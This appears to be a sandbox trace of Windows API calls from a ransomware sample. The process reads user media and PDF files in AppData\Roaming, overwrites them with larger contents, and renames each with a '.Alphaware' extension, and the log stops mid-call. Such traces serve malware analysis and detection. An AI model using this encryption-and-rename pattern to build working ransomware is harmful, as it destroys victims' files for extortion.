[0090.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0090.528] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\EGL9Rx1KXSqWh.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\egl9rx1kxsqwh.mkv"), fInfoLevelId=0x0, lpFileInformation=0x24cd9a0 | out: lpFileInformation=0x24cd9a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7d1a3db0, ftCreationTime.dwHighDateTime=0x1d97660, ftLastAccessTime.dwLowDateTime=0x3aacbce0, ftLastAccessTime.dwHighDateTime=0x1d97684, ftLastWriteTime.dwLowDateTime=0x3aacbce0, ftLastWriteTime.dwHighDateTime=0x1d97684, nFileSizeHigh=0x0, nFileSizeLow=0x7b1b)) returned 1 [0090.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0090.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0090.529] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\EGL9Rx1KXSqWh.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\egl9rx1kxsqwh.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0090.529] ReadFile (in: hFile=0x250, lpBuffer=0x24cdc18, nNumberOfBytesToRead=0x7b1b, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x24cdc18*, lpNumberOfBytesRead=0x23eb38*=0x7b1b, lpOverlapped=0x0) returned 1 [0090.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0090.557] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\EGL9Rx1KXSqWh.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\egl9rx1kxsqwh.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0090.561] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0090.561] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\EGL9Rx1KXSqWh.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\egl9rx1kxsqwh.mkv"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d1a3db0, ftCreationTime.dwHighDateTime=0x1d97660, ftLastAccessTime.dwLowDateTime=0x3aacbce0, ftLastAccessTime.dwHighDateTime=0x1d97684, ftLastWriteTime.dwLowDateTime=0x882bedc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xa4f4)) returned 1 [0090.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0090.561] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\EGL9Rx1KXSqWh.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\egl9rx1kxsqwh.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\EGL9Rx1KXSqWh.mkv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\egl9rx1kxsqwh.mkv.alphaware")) returned 1 [0090.562] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\gV-dKx26kEi.pdf", dwFileAttributes=0x80) returned 1 [0090.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0090.563] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\gV-dKx26kEi.pdf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\gv-dkx26kei.pdf"), fInfoLevelId=0x0, lpFileInformation=0x243a4b0 | out: lpFileInformation=0x243a4b0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xa6219390, ftCreationTime.dwHighDateTime=0x1d975e1, ftLastAccessTime.dwLowDateTime=0x40ed0d40, ftLastAccessTime.dwHighDateTime=0x1d975e8, ftLastWriteTime.dwLowDateTime=0x40ed0d40, ftLastWriteTime.dwHighDateTime=0x1d975e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ded)) returned 1 [0090.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0090.563] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0090.563] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\gV-dKx26kEi.pdf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\gv-dkx26kei.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0090.565] ReadFile (in: hFile=0x250, lpBuffer=0x243a708, nNumberOfBytesToRead=0x4ded, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x243a708*, lpNumberOfBytesRead=0x23eb38*=0x4ded, lpOverlapped=0x0) returned 1 [0090.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0090.592] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\gV-dKx26kEi.pdf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\gv-dkx26kei.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0090.596] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0090.596] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\gV-dKx26kEi.pdf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\gv-dkx26kei.pdf"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6219390, ftCreationTime.dwHighDateTime=0x1d975e1, ftLastAccessTime.dwLowDateTime=0x40ed0d40, ftLastAccessTime.dwHighDateTime=0x1d975e8, ftLastWriteTime.dwLowDateTime=0x883311e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x68b4)) returned 1 [0090.596] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0090.596] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\gV-dKx26kEi.pdf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\gv-dkx26kei.pdf"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\gV-dKx26kEi.pdf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\gv-dkx26kei.pdf.alphaware")) returned 1 [0090.597] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\I4JmLhoyXMGmJxztkf.wav", dwFileAttributes=0x80) returned 1 [0090.598] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0090.598] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\I4JmLhoyXMGmJxztkf.wav" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\i4jmlhoyxmgmjxztkf.wav"), fInfoLevelId=0x0, lpFileInformation=0x24f0690 | out: lpFileInformation=0x24f0690*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x9b8c57d0, ftCreationTime.dwHighDateTime=0x1d97497, ftLastAccessTime.dwLowDateTime=0x13ee9c00, ftLastAccessTime.dwHighDateTime=0x1d97548, ftLastWriteTime.dwLowDateTime=0x13ee9c00, ftLastWriteTime.dwHighDateTime=0x1d97548, nFileSizeHigh=0x0, nFileSizeLow=0x12fb7)) returned 1 [0090.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0090.598] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0090.598] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\I4JmLhoyXMGmJxztkf.wav" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\i4jmlhoyxmgmjxztkf.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0090.598] ReadFile (in: hFile=0x250, lpBuffer=0x24f0940, nNumberOfBytesToRead=0x12fb7, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x24f0940*, lpNumberOfBytesRead=0x23eb38*=0x12fb7, lpOverlapped=0x0) returned 1 [0090.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0090.625] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\I4JmLhoyXMGmJxztkf.wav" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\i4jmlhoyxmgmjxztkf.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.627] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0090.631] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0090.631] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\I4JmLhoyXMGmJxztkf.wav" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\i4jmlhoyxmgmjxztkf.wav"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b8c57d0, ftCreationTime.dwHighDateTime=0x1d97497, ftLastAccessTime.dwLowDateTime=0x13ee9c00, ftLastAccessTime.dwHighDateTime=0x1d97548, ftLastWriteTime.dwLowDateTime=0x8837d4a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x195c8)) returned 1 [0090.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0090.631] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\I4JmLhoyXMGmJxztkf.wav" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\i4jmlhoyxmgmjxztkf.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\I4JmLhoyXMGmJxztkf.wav.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\i4jmlhoyxmgmjxztkf.wav.alphaware")) returned 1 [0090.632] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Im_qpwMGCe7SuRoN0aBx.m4a", dwFileAttributes=0x80) returned 1 [0090.632] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0090.632] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Im_qpwMGCe7SuRoN0aBx.m4a" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\im_qpwmgce7suron0abx.m4a"), fInfoLevelId=0x0, lpFileInformation=0x25ba8a0 | out: lpFileInformation=0x25ba8a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6490b000, ftCreationTime.dwHighDateTime=0x1d97569, ftLastAccessTime.dwLowDateTime=0x53d8b4f0, ftLastAccessTime.dwHighDateTime=0x1d975e2, ftLastWriteTime.dwLowDateTime=0x53d8b4f0, ftLastWriteTime.dwHighDateTime=0x1d975e2, nFileSizeHigh=0x0, nFileSizeLow=0xfe56)) returned 1 [0090.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0090.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0090.633] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Im_qpwMGCe7SuRoN0aBx.m4a" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\im_qpwmgce7suron0abx.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0090.633] ReadFile (in: hFile=0x250, lpBuffer=0x25bab48, nNumberOfBytesToRead=0xfe56, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x25bab48*, lpNumberOfBytesRead=0x23eb38*=0xfe56, lpOverlapped=0x0) returned 1 [0090.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0090.661] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Im_qpwMGCe7SuRoN0aBx.m4a" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\im_qpwmgce7suron0abx.m4a"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0090.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0090.667] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Im_qpwMGCe7SuRoN0aBx.m4a" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\im_qpwmgce7suron0abx.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6490b000, ftCreationTime.dwHighDateTime=0x1d97569, ftLastAccessTime.dwLowDateTime=0x53d8b4f0, ftLastAccessTime.dwHighDateTime=0x1d975e2, ftLastWriteTime.dwLowDateTime=0x883c9760, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x153f4)) returned 1 [0090.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0090.667] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Im_qpwMGCe7SuRoN0aBx.m4a" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\im_qpwmgce7suron0abx.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Im_qpwMGCe7SuRoN0aBx.m4a.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\im_qpwmgce7suron0abx.m4a.alphaware")) returned 1 [0090.670] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\JhfS93kCXhB0dS47UXO.swf", dwFileAttributes=0x80) returned 1 [0090.670] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0090.670] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\JhfS93kCXhB0dS47UXO.swf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\jhfs93kcxhb0ds47uxo.swf"), fInfoLevelId=0x0, lpFileInformation=0x2497f10 | out: lpFileInformation=0x2497f10*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xf3c8c540, ftCreationTime.dwHighDateTime=0x1d96bc9, ftLastAccessTime.dwLowDateTime=0x3f0789c0, ftLastAccessTime.dwHighDateTime=0x1d97119, ftLastWriteTime.dwLowDateTime=0x3f0789c0, ftLastWriteTime.dwHighDateTime=0x1d97119, nFileSizeHigh=0x0, nFileSizeLow=0x152b9)) returned 1 [0090.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0090.670] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0090.670] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\JhfS93kCXhB0dS47UXO.swf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\jhfs93kcxhb0ds47uxo.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.671] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0090.671] ReadFile (in: hFile=0x250, lpBuffer=0x1280bbc0, nNumberOfBytesToRead=0x152b9, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x1280bbc0*, lpNumberOfBytesRead=0x23eb38*=0x152b9, lpOverlapped=0x0) returned 1 [0090.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0090.697] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\JhfS93kCXhB0dS47UXO.swf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\jhfs93kcxhb0ds47uxo.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0090.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0090.705] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\JhfS93kCXhB0dS47UXO.swf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\jhfs93kcxhb0ds47uxo.swf"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3c8c540, ftCreationTime.dwHighDateTime=0x1d96bc9, ftLastAccessTime.dwLowDateTime=0x3f0789c0, ftLastAccessTime.dwHighDateTime=0x1d97119, ftLastWriteTime.dwLowDateTime=0x8843bb80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1c474)) returned 1 [0090.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0090.705] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\JhfS93kCXhB0dS47UXO.swf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\jhfs93kcxhb0ds47uxo.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\JhfS93kCXhB0dS47UXO.swf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\jhfs93kcxhb0ds47uxo.swf.alphaware")) returned 1 [0090.706] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\JPY6Y vdnrHDp.mp3", dwFileAttributes=0x80) returned 1 [0090.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0090.707] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\JPY6Y vdnrHDp.mp3" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\jpy6y vdnrhdp.mp3"), fInfoLevelId=0x0, lpFileInformation=0x2516100 | out: lpFileInformation=0x2516100*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x8b07e7b0, ftCreationTime.dwHighDateTime=0x1d96df0, ftLastAccessTime.dwLowDateTime=0x2eaf0d00, ftLastAccessTime.dwHighDateTime=0x1d97204, ftLastWriteTime.dwLowDateTime=0x2eaf0d00, ftLastWriteTime.dwHighDateTime=0x1d97204, nFileSizeHigh=0x0, nFileSizeLow=0xa39e)) returned 1 [0090.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0090.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0090.707] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\JPY6Y vdnrHDp.mp3" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\jpy6y vdnrhdp.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0090.707] ReadFile (in: hFile=0x250, lpBuffer=0x2516378, nNumberOfBytesToRead=0xa39e, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2516378*, lpNumberOfBytesRead=0x23eb38*=0xa39e, lpOverlapped=0x0) returned 1 [0090.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0090.735] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\JPY6Y vdnrHDp.mp3" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\jpy6y vdnrhdp.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0090.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0090.739] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\JPY6Y vdnrHDp.mp3" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\jpy6y vdnrhdp.mp3"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b07e7b0, ftCreationTime.dwHighDateTime=0x1d96df0, ftLastAccessTime.dwLowDateTime=0x2eaf0d00, ftLastAccessTime.dwHighDateTime=0x1d97204, ftLastWriteTime.dwLowDateTime=0x88487e40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdaf4)) returned 1 [0090.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0090.739] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\JPY6Y vdnrHDp.mp3" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\jpy6y vdnrhdp.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\JPY6Y vdnrHDp.mp3.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\jpy6y vdnrhdp.mp3.alphaware")) returned 1 [0090.740] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\kz1HaTIACtkD69pq32M.m4a", dwFileAttributes=0x80) returned 1 [0090.741] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0090.741] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\kz1HaTIACtkD69pq32M.m4a" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\kz1hatiactkd69pq32m.m4a"), fInfoLevelId=0x0, lpFileInformation=0x25d1978 | out: lpFileInformation=0x25d1978*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe55f0720, ftCreationTime.dwHighDateTime=0x1d9736d, ftLastAccessTime.dwLowDateTime=0xaad61ba0, ftLastAccessTime.dwHighDateTime=0x1d974c8, ftLastWriteTime.dwLowDateTime=0xaad61ba0, ftLastWriteTime.dwHighDateTime=0x1d974c8, nFileSizeHigh=0x0, nFileSizeLow=0x73fc)) returned 1 [0090.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0090.741] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0090.741] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\kz1HaTIACtkD69pq32M.m4a" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\kz1hatiactkd69pq32m.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0090.741] ReadFile (in: hFile=0x250, lpBuffer=0x25d1c10, nNumberOfBytesToRead=0x73fc, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x25d1c10*, lpNumberOfBytesRead=0x23eb38*=0x73fc, lpOverlapped=0x0) returned 1 [0090.779] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0090.779] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\kz1HaTIACtkD69pq32M.m4a" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\kz1hatiactkd69pq32m.m4a"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.781] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0090.783] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0090.783] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\kz1HaTIACtkD69pq32M.m4a" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\kz1hatiactkd69pq32m.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe55f0720, ftCreationTime.dwHighDateTime=0x1d9736d, ftLastAccessTime.dwLowDateTime=0xaad61ba0, ftLastAccessTime.dwHighDateTime=0x1d974c8, ftLastWriteTime.dwLowDateTime=0x884fa260, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x9b74)) returned 1 [0090.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0090.783] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\kz1HaTIACtkD69pq32M.m4a" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\kz1hatiactkd69pq32m.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\kz1HaTIACtkD69pq32M.m4a.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\kz1hatiactkd69pq32m.m4a.alphaware")) returned 1 [0090.784] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\lKBIj-DLGhLH.m4a", dwFileAttributes=0x80) returned 1 [0090.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0090.785] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\lKBIj-DLGhLH.m4a" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\lkbij-dlghlh.m4a"), fInfoLevelId=0x0, lpFileInformation=0x244d8f8 | out: lpFileInformation=0x244d8f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x112bcfa0, ftCreationTime.dwHighDateTime=0x1d96eff, ftLastAccessTime.dwLowDateTime=0x6e2e85a0, ftLastAccessTime.dwHighDateTime=0x1d9701f, ftLastWriteTime.dwLowDateTime=0x6e2e85a0, ftLastWriteTime.dwHighDateTime=0x1d9701f, nFileSizeHigh=0x0, nFileSizeLow=0x15944)) returned 1 [0090.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0090.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0090.785] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\lKBIj-DLGhLH.m4a" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\lkbij-dlghlh.m4a"), 